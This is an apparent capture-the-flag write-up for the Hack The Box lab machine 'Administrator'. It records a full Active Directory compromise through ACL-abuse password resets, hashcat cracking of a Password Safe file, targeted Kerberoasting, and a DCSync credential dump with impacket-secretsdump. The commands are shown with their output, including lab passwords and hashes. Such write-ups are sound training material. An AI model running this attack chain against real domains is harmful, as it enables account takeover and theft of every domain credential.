Machine Info

Spoiler
Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided. To gain access to the michael account, ACLs (Access Control Lists) over privileged objects are enumerated, leading us to discover that the user olivia has GenericAll permissions over michael, allowing us to reset his password. With access as michael, it is revealed that he can force a password change on the user benjamin, whose password is reset. This grants access to FTP where a backup.psafe3 file is discovered, cracked, and reveals credentials for several users. These credentials are sprayed across the domain, revealing valid credentials for the user emily. Further enumeration shows that emily has GenericWrite permissions over the user ethan, allowing us to perform a targeted Kerberoasting attack. The recovered hash is cracked and reveals valid credentials for ethan, who is found to have DCSync rights ultimately allowing retrieval of the Administrator account hash and full domain compromise.

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

└─$ nmap -p$ports -sC -sV $VICTIM
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-31 13:20 CET
Nmap scan report for administrator.htb (10.129.5.192)
Host is up (0.043s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-31 19:20:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
50986/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50997/tcp open  msrpc         Microsoft Windows RPC
51002/tcp open  msrpc         Microsoft Windows RPC
51005/tcp open  msrpc         Microsoft Windows RPC
51021/tcp open  msrpc         Microsoft Windows RPC
57513/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-31T19:21:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Let’s add dc.administrator.htb & administrator.htb to our /etc/hosts

AD Enumeration

We are given credentials so we start with enumerating the AD.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

└─$ impacket-lookupsid administrator.htb/[email protected]
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Brute forcing SIDs at administrator.htb
[*] StringBinding ncacn_np:administrator.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1088858960-373806567-254189436
498: ADMINISTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMINISTRATOR\Administrator (SidTypeUser)
501: ADMINISTRATOR\Guest (SidTypeUser)
502: ADMINISTRATOR\krbtgt (SidTypeUser)
512: ADMINISTRATOR\Domain Admins (SidTypeGroup)
513: ADMINISTRATOR\Domain Users (SidTypeGroup)
514: ADMINISTRATOR\Domain Guests (SidTypeGroup)
515: ADMINISTRATOR\Domain Computers (SidTypeGroup)
516: ADMINISTRATOR\Domain Controllers (SidTypeGroup)
517: ADMINISTRATOR\Cert Publishers (SidTypeAlias)
518: ADMINISTRATOR\Schema Admins (SidTypeGroup)
519: ADMINISTRATOR\Enterprise Admins (SidTypeGroup)
520: ADMINISTRATOR\Group Policy Creator Owners (SidTypeGroup)
521: ADMINISTRATOR\Read-only Domain Controllers (SidTypeGroup)
522: ADMINISTRATOR\Cloneable Domain Controllers (SidTypeGroup)
525: ADMINISTRATOR\Protected Users (SidTypeGroup)
526: ADMINISTRATOR\Key Admins (SidTypeGroup)
527: ADMINISTRATOR\Enterprise Key Admins (SidTypeGroup)
553: ADMINISTRATOR\RAS and IAS Servers (SidTypeAlias)
571: ADMINISTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
572: ADMINISTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
1000: ADMINISTRATOR\DC$ (SidTypeUser)
1101: ADMINISTRATOR\DnsAdmins (SidTypeAlias)
1102: ADMINISTRATOR\DnsUpdateProxy (SidTypeGroup)
1108: ADMINISTRATOR\olivia (SidTypeUser)
1109: ADMINISTRATOR\michael (SidTypeUser)
1110: ADMINISTRATOR\benjamin (SidTypeUser)
1111: ADMINISTRATOR\Share Moderators (SidTypeAlias)
1112: ADMINISTRATOR\emily (SidTypeUser)
1113: ADMINISTRATOR\ethan (SidTypeUser)
3601: ADMINISTRATOR\alexander (SidTypeUser)
3602: ADMINISTRATOR\emma (SidTypeUser)

We tried password spray attacks and also to connect to FTP but didn’t succeed. Let’s move forward with running Bloodhound.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

└─$ bloodhound-python -d administrator.htb -u olivia  -dc dc.administrator.htb -ns $VICTIM  -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
Password: 
INFO: Found AD domain: administrator.htb                                                     
INFO: Getting TGT for user                                                                   
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known                  
INFO: Connecting to LDAP server: dc.administrator.htb                                        
INFO: Found 1 domains                                                                        
INFO: Found 1 domains in the forest                                                          
INFO: Found 1 computers                                                                      
INFO: Connecting to LDAP server: dc.administrator.htb                                        
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 11S

Pivot Users

From the results we find interesting domain privileges.

It shows basically that our known user can pivot to michael and then benjamin with the GenericAll and ForceChangePassword object controls. So at first what we can do is basically gain access to michael by changing his password.

1

└─$ net rpc password michael 'NewPass123!' -U 'ADMINISTRATOR.HTB/olivia%ichliebedich' -S administrator.htb

1
2
3

└─$ crackmapexec smb administrator.htb -u michael  -p 'NewPass123!' --continue-on-success
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [+] administrator.htb\michael:NewPass123!

We can confirm our attack worked. Without but post-enumeration for user michael we go straight to do the same and pivot to user benjamin.

1

└─$ net rpc password benjamin 'NewPass123!' -U 'ADMINISTRATOR.HTB/michael%NewPass123!' -S administrator.htb

Password Safe

Benjamin is part of the group Share Moderators and so let’s see if he is the one being able to access the FTP share.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

─$ ftp [email protected]
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49435|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||49439|)
125 Data connection already open; Transfer starting.
100% |************************************************|   952       33.20 KiB/s    00:00 ETA
226 Transfer complete.

We come across Backup.psafe3. The extension is for single password encrypted files from Password Safe.

From their website: Whether the answer is one or hundreds, Password Safe allows you to safely and easily create a secured and encrypted user name/password list. With Password Safe all you have to do is create and remember a single “Master Password” of your choice in order to unlock and access your entire user name/password list.

We find that there is a mode (5200) in Hashcat that can try crack the password of the backup. Let’s use this.

psafe3 Cracked Password
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

└─$ hashcat -m 5200  Backup.psafe3  /usr/share/wordlists/rockyou.txt.gz              
hashcat (v7.1.2) starting

...
Backup.psafe3:tekieromucho
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Sat Jan 31 15:52:43 2026 (0 secs)
Time.Estimated...: Sat Jan 31 15:52:43 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   959.4 kH/s (6.24ms) @ Accel:3 Loops:512 Thr:512 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 30720/14344385 (0.21%)
Rejected.........: 0/30720 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> *star*
Hardware.Mon.#01.: Temp: 53c Util: 53% Core:1905MHz Mem:6000MHz Bus:8

Started: Sat Jan 31 15:52:41 2026
Stopped: Sat Jan 31 15:52:44 2026

Looking at the picture we can see the list of user credentials we can copy. The one from Emily Rodriguez is interesting for us

Emily's Password
UXLCI5iETUsIBoFVTj8yQFKoHjXmb

With emily we can login to the DC and grab the user flag.

Root

More User Pivoting

Looking at our new user access we see that Emily has also interesting outbound controls. She has GenericWrite to Ethan who later can GetChangesAll from the Administrator.htb domain, in other words perform DCSync. Let’s first abuse GenericWrite.

Info

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user.

With GenericWrite we can follow two routes for abusing this. Either we perform Shadow Credential Attack were we write msds-KeyCredentialLink attribute on the target object (Ethan) and authenticate as the principal using kerberos PKINIT.

Alternatively, we can perform a Targeted Kerberoast attack as GenericWrite enables Emily to set a ServicePrincipalName (SPN) on the targeted user. Then we get and crack that hash. We will go with the later!

For that we are going to use targetedKerberoast.py, a tool that can perform that specific attack. Basically to perform a targeted kerberoast, we’ll use the GenericWrite privilege to give ethan an SPN. Then we can request a ticket for that fake service, and get a ticket encrypted with ethan’s password hash. If that password is weak, I can crack it offline.

1
2
3
4
5
6

└─$ faketime "$(ntpdate -q administrator.htb | cut -d ' ' -f 1,2)" targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' 

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$ae031d8d773710c1298fe036b3f29b6a$0f87a06c3dc263a421764602e2545ebae3998b6dad62c1ace56b9086239ddc000ffd95a88802e91cd63e2e2624c21e51326578980bce56189e12b5d1d65c59c8c4c867d6865832d8cfcbd6d77532daacadcac20356bb41d200f87703044a75add5fde198d1b3b253969deb8db01d7fc2e3a216a2477878d951994654441a87df989e75afe2c2351c2374cd7b1e921c7aaa6e4122247b9da3d4dfd2d10ec2e44976254e4361aa72094ef7eef06bb44ffeb20d21662329bdd63a133ebfe95006594fede55f6c78bd0279349b35b16b93d1bad25bc2b8b3218202b5352414503bcb519c5a266af863efe57d61e2170f6aaac6e79e12063e0868d4c78f37ca5cdf26cb48cb1a57a204e7fc44a6519567d2f89eb414a69a4ed92fcab1a795ee25ede87e81ed0e4875babdf87fdea7b7e553644f63fcba5b1a06a8f1e5f5fa49bd78e738c8ee8c70e2526df6f6e21be4957c58c30f506a40f8714cae884a690081715b5bfd7eb02e1c23664a643c84d98c7044a9835d81bfb35d25e27c1893f13c8cd933bf6ea88c7cfcc065b5fa19c17c37098976b1d18f966fd0daf2d14b046efdfb86cd14f1339fc1bd5dd40e83805bb4af1cd8eb276797661257df4783483c6943bbabf7aac21c84db0c54ac0d45e93b525a2c4e8f4cea45d960053eeb4999e96270b2d226a152157e427f4738a94189b9118ff850c5b4a4ba43ddbfe37e0b1014165cefa1238cefd60b3ed1054de32b744fdb1e63bbed2e7b6a9c177fa465250df82c1af564da19bf0c505c39db489c3c73f105890c71df099dacf1e859280c038014ccf1a25430f9b99eeb521769f8379276a282f59449c7b0d857fc6fcb3ba7e4e9546b94a635dd1b8447d39cd84717e94e486dec750cd048bdf26e4f97904ef5063258531faeee8648c4aafb84d70de40ed4c5e406bcf33352e248c662fe5647ec39c13d563fae7683eb638aaab597b4cede6e3e461a17d4bb8fe6c376b13564dd3721424e7a18576ce7dafcf760f56e73a002198271273d857d0d51a4a84bab6d254f5b9b4d20f56c94d48f007c3c0f387a9c9a83c879bd2e099fab5ddb7cd00098707a166a8da0dd901c1de6c777e80de4fb7f48523d92af47ea6645da0aa9ca46c798d5a50f76f62ac4e9052e24d6d2ba88ea6e11038aae437f41ca10e219694986eaf7bfd4a6d27b3900b399f3a58c8056c7d995e873d398234f4794625582c1fa9a3322392a6f3d6c09fd488334198632709f1df5ee7d519294de799d73c789464fd719a2b4e9da7a6aa2d33211f7f3179e09aea5f6a642aeb6956a63c7a52d83c74e641662f18afcba42eca22b4c4a350f45ae56845ffcba55a265f685fef1e26935d2277a20e29ff8829be8954ebe1c2ecf8e5413c44e1b1ed4ef39564f148b08a4567171880f9446bbd9dada4dfc13b0dc5a2dedc1c53d2e083fa62d69d50dea9552f85cd6850b65e254a34349393d54c9b0c98e9bf01ef9b683cbd1e6147c9a85b094df9b0347a7ca8da83be983b81df2bc45ca3f8855839231

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

└─$ hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt.gz
hashcat (v7.1.2) starting


$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$ae031d8d773710c1298fe036b3f29b6a$0f87a06c3dc263a421764602e2545ebae3998b6dad62c1ace56b9086239ddc000ffd95a88802e91cd63e2e2624c21e51326578980bce56189e12b5d1d65c59c8c4c867d6865832d8cfcbd6d77532daacadcac20356bb41d200f87703044a75add5fde198d1b3b253969deb8db01d7fc2e3a216a2477878d951994654441a87df989e75afe2c2351c2374cd7b1e921c7aaa6e4122247b9da3d4dfd2d10ec2e44976254e4361aa72094ef7eef06bb44ffeb20d21662329bdd63a133ebfe95006594fede55f6c78bd0279349b35b16b93d1bad25bc2b8b3218202b5352414503bcb519c5a266af863efe57d61e2170f6aaac6e79e12063e0868d4c78f37ca5cdf26cb48cb1a57a204e7fc44a6519567d2f89eb414a69a4ed92fcab1a795ee25ede87e81ed0e4875babdf87fdea7b7e553644f63fcba5b1a06a8f1e5f5fa49bd78e738c8ee8c70e2526df6f6e21be4957c58c30f506a40f8714cae884a690081715b5bfd7eb02e1c23664a643c84d98c7044a9835d81bfb35d25e27c1893f13c8cd933bf6ea88c7cfcc065b5fa19c17c37098976b1d18f966fd0daf2d14b046efdfb86cd14f1339fc1bd5dd40e83805bb4af1cd8eb276797661257df4783483c6943bbabf7aac21c84db0c54ac0d45e93b525a2c4e8f4cea45d960053eeb4999e96270b2d226a152157e427f4738a94189b9118ff850c5b4a4ba43ddbfe37e0b1014165cefa1238cefd60b3ed1054de32b744fdb1e63bbed2e7b6a9c177fa465250df82c1af564da19bf0c505c39db489c3c73f105890c71df099dacf1e859280c038014ccf1a25430f9b99eeb521769f8379276a282f59449c7b0d857fc6fcb3ba7e4e9546b94a635dd1b8447d39cd84717e94e486dec750cd048bdf26e4f97904ef5063258531faeee8648c4aafb84d70de40ed4c5e406bcf33352e248c662fe5647ec39c13d563fae7683eb638aaab597b4cede6e3e461a17d4bb8fe6c376b13564dd3721424e7a18576ce7dafcf760f56e73a002198271273d857d0d51a4a84bab6d254f5b9b4d20f56c94d48f007c3c0f387a9c9a83c879bd2e099fab5ddb7cd00098707a166a8da0dd901c1de6c777e80de4fb7f48523d92af47ea6645da0aa9ca46c798d5a50f76f62ac4e9052e24d6d2ba88ea6e11038aae437f41ca10e219694986eaf7bfd4a6d27b3900b399f3a58c8056c7d995e873d398234f4794625582c1fa9a3322392a6f3d6c09fd488334198632709f1df5ee7d519294de799d73c789464fd719a2b4e9da7a6aa2d33211f7f3179e09aea5f6a642aeb6956a63c7a52d83c74e641662f18afcba42eca22b4c4a350f45ae56845ffcba55a265f685fef1e26935d2277a20e29ff8829be8954ebe1c2ecf8e5413c44e1b1ed4ef39564f148b08a4567171880f9446bbd9dada4dfc13b0dc5a2dedc1c53d2e083fa62d69d50dea9552f85cd6850b65e254a34349393d54c9b0c98e9bf01ef9b683cbd1e6147c9a85b094df9b0347a7ca8da83be983b81df2bc45ca3f8855839231:<SPOILER>
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....839231
Time.Started.....: Sat Jan 31 17:14:23 2026 (0 secs)
Time.Estimated...: Sat Jan 31 17:14:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 45629.9 kH/s (6.63ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 655360/14344385 (4.57%)
Rejected.........: 0/655360 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> grassa
Ethan's password
limpbizkit

Lastly we can perform a DCSync attack with ethan and get domain admin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

└─$ impacket-secretsdump administrator.htb/[email protected]
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SPOILER>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:25451b15eeabfa492d9a18442a6e914b:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:25451b15eeabfa492d9a18442a6e914b:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:615a7b6664f0bfc7160e1d3cfe1ca134ffdacaa656ccddd7167aa283c8b211e0
administrator.htb\michael:aes128-cts-hmac-sha1-96:4374c22e248e847055a39bd1d18cf90b
administrator.htb\michael:des-cbc-md5:cbcb10e05210bc51
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:3e2ad3748befe7d37e09d531f546a4378a9a5c3fc896847967cb809be66de907
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:ac2859f4e518f43820a2f739409087af
administrator.htb\benjamin:des-cbc-md5:5dc4f43b1a792cce
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
Admininstrator Hash
3dc553ce4b9fd20bd016e098d2d2fd2e

We can now log in to the DC as admin (Pass the Hash) and get the root flag.